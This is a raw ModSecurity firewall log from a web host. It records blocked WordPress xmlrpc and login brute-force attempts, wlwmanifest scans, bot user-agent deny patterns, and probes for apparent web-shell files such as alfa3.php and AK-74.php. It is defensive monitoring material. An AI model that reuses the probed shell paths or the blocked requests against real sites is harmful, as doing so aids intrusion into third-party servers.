[Tue May 26 15:57:09.323537 2026] [security2:error] [pid 747840:tid 748017] [client 35.199.175.60:53635] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "rathnaa.co.in.svijaykumar.in"] [uri "/2021/wp-includes/wlwmanifest.xml"] [unique_id "ahV1fYm6MwAuYuZKxvkNvwAAATk"]
[Tue May 26 15:57:09.624752 2026] [security2:error] [pid 745492:tid 745744] [client 35.199.175.60:55836] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "rathnaa.co.in.svijaykumar.in"] [uri "/shop/wp-includes/wlwmanifest.xml"] [unique_id "ahV1fYmEQglTmoWcfxKSGwAAAPw"]
[Tue May 26 15:57:09.847159 2026] [security2:error] [pid 745492:tid 745680] [client 35.199.175.60:51680] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "rathnaa.co.in.svijaykumar.in"] [uri "/wp1/wp-includes/wlwmanifest.xml"] [unique_id "ahV1fYmEQglTmoWcfxKSHwAAALw"]
[Tue May 26 15:57:10.068173 2026] [security2:error] [pid 745492:tid 745659] [client 35.199.175.60:53824] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "rathnaa.co.in.svijaykumar.in"] [uri "/test/wp-includes/wlwmanifest.xml"] [unique_id "ahV1fomEQglTmoWcfxKSJgAAAKc"]
[Tue May 26 15:57:10.438020 2026] [security2:error] [pid 745492:tid 745698] [client 35.199.175.60:62578] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "rathnaa.co.in.svijaykumar.in"] [uri "/site/wp-includes/wlwmanifest.xml"] [unique_id "ahV1fomEQglTmoWcfxKSLQAAAM4"]
[Tue May 26 15:57:10.689592 2026] [security2:error] [pid 745492:tid 745752] [client 35.199.175.60:63320] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "rathnaa.co.in.svijaykumar.in"] [uri "/cms/wp-includes/wlwmanifest.xml"] [unique_id "ahV1fomEQglTmoWcfxKSNAAAAQQ"]
[Tue May 26 15:57:10.784824 2026] [security2:error] [pid 745492:tid 745736] [client 57.141.2.29:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV1fomEQglTmoWcfxKSLAAAAPQ"]
[Tue May 26 15:57:10.990520 2026] [security2:error] [pid 745492:tid 745681] [client 106.219.85.83:7729] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 83.85.219.106.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "soto-plumbing.com"] [uri "/xmlrpc.php"] [unique_id "ahV1fomEQglTmoWcfxKSOAAAAL0"]
[Tue May 26 15:57:10.990718 2026] [security2:error] [pid 745492:tid 745681] [client 106.219.85.83:7729] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "soto-plumbing.com"] [uri "/xmlrpc.php"] [unique_id "ahV1fomEQglTmoWcfxKSOAAAAL0"]
[Tue May 26 15:57:11.533048 2026] [security2:error] [pid 745492:tid 745667] [client 103.153.130.62:63473] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 62.130.153.103.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "anujtradingco.com"] [uri "/xmlrpc.php"] [unique_id "ahV1f4mEQglTmoWcfxKSRwAAAK8"]
[Tue May 26 15:57:11.533215 2026] [security2:error] [pid 745492:tid 745667] [client 103.153.130.62:63473] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "anujtradingco.com"] [uri "/xmlrpc.php"] [unique_id "ahV1f4mEQglTmoWcfxKSRwAAAK8"]
[Tue May 26 15:57:11.922796 2026] [security2:error] [pid 745492:tid 745730] [client 85.208.96.209:21408] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "theafterglow-centre.com"] [uri "/events/tag/june-9-13/day/2023-01-23/"] [unique_id "ahV1f4mEQglTmoWcfxKSVwAAAO4"]
[Tue May 26 15:57:11.922912 2026] [security2:error] [pid 745492:tid 745730] [client 85.208.96.209:21408] ModSecurity: Warning. Matched phrase "Semrush" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "theafterglow-centre.com"] [uri "/events/tag/june-9-13/day/2023-01-23/"] [unique_id "ahV1f4mEQglTmoWcfxKSVwAAAO4"]
[Tue May 26 15:57:12.744327 2026] [security2:error] [pid 745492:tid 745684] [client 57.141.2.38:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV1gImEQglTmoWcfxKSaAAAAMA"]
[Tue May 26 15:57:13.202024 2026] [security2:error] [pid 745492:tid 745638] [client 223.123.125.8:64775] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 8.125.123.223.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "thriveswift.com"] [uri "/xmlrpc.php"] [unique_id "ahV1gYmEQglTmoWcfxKSiAAAAJI"]
[Tue May 26 15:57:13.209376 2026] [security2:error] [pid 745492:tid 745638] [client 223.123.125.8:64775] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "thriveswift.com"] [uri "/xmlrpc.php"] [unique_id "ahV1gYmEQglTmoWcfxKSiAAAAJI"]
[Tue May 26 15:57:13.287086 2026] [security2:error] [pid 745492:tid 745568] [remote 52.18.195.140:57036] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 140.195.18.52.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "preetishah.moes-art.com"] [uri "/wp-login.php"] [unique_id "ahV1gYmEQglTmoWcfxKShAABBEg"]
[Tue May 26 15:57:14.568752 2026] [security2:error] [pid 745492:tid 745649] [client 103.44.52.196:40440] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 196.52.44.103.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahV1gomEQglTmoWcfxKSrgAAAJ0"]
[Tue May 26 15:57:14.568898 2026] [security2:error] [pid 745492:tid 745649] [client 103.44.52.196:40440] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahV1gomEQglTmoWcfxKSrgAAAJ0"]
[Tue May 26 15:57:14.871572 2026] [security2:error] [pid 745492:tid 745680] [client 57.141.2.23:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV1gomEQglTmoWcfxKSqgAAALw"]
[Tue May 26 15:57:16.275970 2026] [security2:error] [pid 745492:tid 745747] [client 143.110.243.118:45732] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 118.243.110.143.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.grcorp.moes-art.com"] [uri "/AK-74.php"] [unique_id "ahV1hImEQglTmoWcfxKS6QAAAP8"]
[Tue May 26 15:57:16.702928 2026] [security2:error] [pid 745492:tid 745595] [remote 209.42.19.17:50748] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 17.19.42.209.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "preetishah.com"] [uri "/wp-login.php"] [unique_id "ahV1hImEQglTmoWcfxKS8AAAnmM"]
[Tue May 26 15:57:16.979451 2026] [security2:error] [pid 745492:tid 745685] [client 57.141.2.55:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV1hImEQglTmoWcfxKS8wAAAME"]
[Tue May 26 15:57:18.984768 2026] [security2:error] [pid 745492:tid 745714] [client 57.141.2.28:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV1homEQglTmoWcfxKTMgAAAN4"]
[Tue May 26 15:57:20.042154 2026] [security2:error] [pid 745492:tid 745628] [client 114.119.138.27:57931] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "krishnawoodworks.com"] [uri "/images/kww-product-whitetradeplywoods.jpg"] [unique_id "ahV1iImEQglTmoWcfxKTVgAAAIg"], referer: http://krishnawoodworks.com/images/kww-product-whitetradeplywoods.jpg
[Tue May 26 15:57:21.096542 2026] [security2:error] [pid 745492:tid 745649] [client 57.141.2.52:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV1iImEQglTmoWcfxKTYwAAAJ0"]
[Tue May 26 15:57:21.522190 2026] [security2:error] [pid 745492:tid 745625] [client 106.219.85.83:25002] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 83.85.219.106.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "soto-plumbing.com"] [uri "/xmlrpc.php"] [unique_id "ahV1iYmEQglTmoWcfxKTfAAAAIU"]
[Tue May 26 15:57:21.522435 2026] [security2:error] [pid 745492:tid 745625] [client 106.219.85.83:25002] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "soto-plumbing.com"] [uri "/xmlrpc.php"] [unique_id "ahV1iYmEQglTmoWcfxKTfAAAAIU"]
[Tue May 26 15:57:21.765047 2026] [security2:error] [pid 745492:tid 745745] [client 103.153.130.62:63744] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 62.130.153.103.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "anujtradingco.com"] [uri "/xmlrpc.php"] [unique_id "ahV1iYmEQglTmoWcfxKThAAAAP0"]
[Tue May 26 15:57:21.765177 2026] [security2:error] [pid 745492:tid 745745] [client 103.153.130.62:63744] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "anujtradingco.com"] [uri "/xmlrpc.php"] [unique_id "ahV1iYmEQglTmoWcfxKThAAAAP0"]
[Tue May 26 15:57:22.964113 2026] [security2:error] [pid 745492:tid 745690] [client 57.141.2.3:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV1iomEQglTmoWcfxKTmQAAAMY"]
[Tue May 26 15:57:23.691152 2026] [security2:error] [pid 745492:tid 745662] [client 223.123.125.8:64776] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 8.125.123.223.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "thriveswift.com"] [uri "/xmlrpc.php"] [unique_id "ahV1i4mEQglTmoWcfxKTwwAAAKo"]
[Tue May 26 15:57:23.691315 2026] [security2:error] [pid 745492:tid 745662] [client 223.123.125.8:64776] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "thriveswift.com"] [uri "/xmlrpc.php"] [unique_id "ahV1i4mEQglTmoWcfxKTwwAAAKo"]
[Tue May 26 15:57:24.526453 2026] [security2:error] [pid 745492:tid 745697] [client 57.141.2.29:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV1jImEQglTmoWcfxKT4AAAAM0"]
[Tue May 26 15:57:24.858071 2026] [security2:error] [pid 745492:tid 745664] [client 143.110.243.118:56224] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 118.243.110.143.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.grcorp.moes-art.com"] [uri "/alfa3.php/"] [unique_id "ahV1jImEQglTmoWcfxKT9wAAAKw"]
[Tue May 26 15:57:25.192847 2026] [security2:error] [pid 745492:tid 745690] [client 103.44.52.196:35852] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 196.52.44.103.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahV1jYmEQglTmoWcfxKT-QAAAMY"]
[Tue May 26 15:57:25.192980 2026] [security2:error] [pid 745492:tid 745690] [client 103.44.52.196:35852] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahV1jYmEQglTmoWcfxKT-QAAAMY"]
[Tue May 26 15:57:25.541857 2026] [security2:error] [pid 745492:tid 745652] [client 149.5.4.71:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.anujtradingco.com"] [uri "/index.php"] [unique_id "ahV1jYmEQglTmoWcfxKUCwAAAKA"], referer: https://www.anujtradingco.com/
[Tue May 26 15:57:26.250557 2026] [security2:error] [pid 745492:tid 745646] [client 149.5.4.71:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahV1jomEQglTmoWcfxKUGQAAAJo"], referer: https://www.anujtradingco.com/pages/services-wide/?unapproved=1229317&moderation-hash=3a5ff18fa635b812152aa8d1217df765
[Tue May 26 15:57:26.599447 2026] [security2:error] [pid 745492:tid 745697] [client 66.249.64.110:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "302"] [hostname "eco-green.com.mx"] [uri "/w2.php"] [unique_id "ahV1jomEQglTmoWcfxKUMAAAAM0"]
[Tue May 26 15:57:26.599830 2026] [security2:error] [pid 745492:tid 745713] [client 66.249.64.110:40854] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "302"] [hostname "eco-green.com.mx"] [uri "/w2.php"] [unique_id "ahV1jomEQglTmoWcfxKUJwAAAN0"]
[Tue May 26 15:57:27.552958 2026] [security2:error] [pid 745492:tid 745711] [client 57.141.2.39:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV1j4mEQglTmoWcfxKURgAAANs"]
[Tue May 26 15:57:27.618342 2026] [security2:error] [pid 745492:tid 745523] [remote 156.59.198.135:24170] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "www.yourstorybag.com"] [uri "/wp-content/uploads/2024/07/STEM-Childrens-Books-Curated-by-Your-Story-Bag.pdf"] [unique_id "ahV1j4mEQglTmoWcfxKUUAAA5xs"]
[Tue May 26 15:57:29.469605 2026] [security2:error] [pid 745492:tid 745709] [client 57.141.2.70:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV1kYmEQglTmoWcfxKUeAAAANk"]
[Tue May 26 15:57:31.765802 2026] [security2:error] [pid 745492:tid 745681] [client 57.141.2.50:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV1k4mEQglTmoWcfxKUrQAAAL0"]
[Tue May 26 15:57:32.043121 2026] [security2:error] [pid 745492:tid 745735] [client 103.153.130.62:64013] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 62.130.153.103.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "anujtradingco.com"] [uri "/xmlrpc.php"] [unique_id "ahV1lImEQglTmoWcfxKUwAAAAPM"]
[Tue May 26 15:57:32.043553 2026] [security2:error] [pid 745492:tid 745735] [client 103.153.130.62:64013] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "anujtradingco.com"] [uri "/xmlrpc.php"] [unique_id "ahV1lImEQglTmoWcfxKUwAAAAPM"]
[Tue May 26 15:57:32.164442 2026] [security2:error] [pid 745492:tid 745737] [client 106.219.85.83:12205] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 83.85.219.106.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "soto-plumbing.com"] [uri "/xmlrpc.php"] [unique_id "ahV1lImEQglTmoWcfxKUxQAAAPU"]
[Tue May 26 15:57:32.164569 2026] [security2:error] [pid 745492:tid 745737] [client 106.219.85.83:12205] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "soto-plumbing.com"] [uri "/xmlrpc.php"] [unique_id "ahV1lImEQglTmoWcfxKUxQAAAPU"]
[Tue May 26 15:57:32.835484 2026] [security2:error] [pid 745492:tid 745646] [client 57.141.2.3:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV1lImEQglTmoWcfxKUzQAAAJo"]
[Tue May 26 15:57:35.375772 2026] [security2:error] [pid 745492:tid 745643] [client 57.141.2.15:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV1lomEQglTmoWcfxKVFQAAAJc"]
[Tue May 26 15:57:35.440331 2026] [security2:error] [pid 745492:tid 745545] [remote 84.247.181.196:52502] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 196.181.247.84.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "crustiesplacebakery.com.thedebateafrica.org"] [uri "/wp-login.php"] [unique_id "ahV1l4mEQglTmoWcfxKVGwAA2zE"]
[Tue May 26 15:57:35.859111 2026] [security2:error] [pid 745492:tid 745646] [client 103.44.52.196:36602] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 196.52.44.103.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahV1l4mEQglTmoWcfxKVLgAAAJo"]
[Tue May 26 15:57:35.859257 2026] [security2:error] [pid 745492:tid 745646] [client 103.44.52.196:36602] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahV1l4mEQglTmoWcfxKVLgAAAJo"]
[Tue May 26 15:57:37.935704 2026] [security2:error] [pid 745492:tid 745656] [client 57.141.2.61:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV1mYmEQglTmoWcfxKVTwAAAKQ"]
[Tue May 26 15:57:38.049443 2026] [security2:error] [pid 745492:tid 745651] [client 66.249.64.109:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "302"] [hostname "eco-green.com.mx"] [uri "/w2.php"] [unique_id "ahV1momEQglTmoWcfxKVYQAAAJ8"]
[Tue May 26 15:57:38.049794 2026] [security2:error] [pid 745492:tid 745727] [client 66.249.64.109:56699] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "302"] [hostname "eco-green.com.mx"] [uri "/w2.php"] [unique_id "ahV1mYmEQglTmoWcfxKVWQAAAOs"]
[Tue May 26 15:57:38.205173 2026] [security2:error] [pid 745492:tid 745749] [client 172.81.133.213:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.anujtradingco.com"] [uri "/index.php"] [unique_id "ahV1momEQglTmoWcfxKVZAAAAQE"], referer: https://www.anujtradingco.com/
[Tue May 26 15:57:38.751008 2026] [security2:error] [pid 745492:tid 745631] [client 172.81.133.213:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahV1momEQglTmoWcfxKVdQAAAIs"], referer: https://www.anujtradingco.com/top-deejay-headphones/?unapproved=1509157&moderation-hash=e5adc6f35faba27037f6048fa8ca1044
[Tue May 26 15:57:38.850821 2026] [security2:error] [pid 745492:tid 745726] [client 34.66.94.210:45284] ModSecurity: Access denied with code 406 (phase 1). Pattern match "python-requests|python-urllib" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "1460"] [id "909111"] [msg "Python UA brute"] [hostname "virgence.com"] [uri "/"] [unique_id "ahV1momEQglTmoWcfxKVegAAAOo"]
[Tue May 26 15:57:39.536400 2026] [security2:error] [pid 745492:tid 745628] [client 57.141.2.16:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV1m4mEQglTmoWcfxKVjQAAAIg"]
[Tue May 26 15:57:39.746749 2026] [security2:error] [pid 745492:tid 745707] [client 172.81.133.213:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahV1m4mEQglTmoWcfxKVlwAAANc"], referer: https://anujtradingco.com
[Tue May 26 15:57:39.972198 2026] [security2:error] [pid 745492:tid 745683] [client 143.110.243.118:59682] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 118.243.110.143.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.grcorp.moes-art.com"] [uri "/alfaindex.php"] [unique_id "ahV1m4mEQglTmoWcfxKVqAAAAL8"]
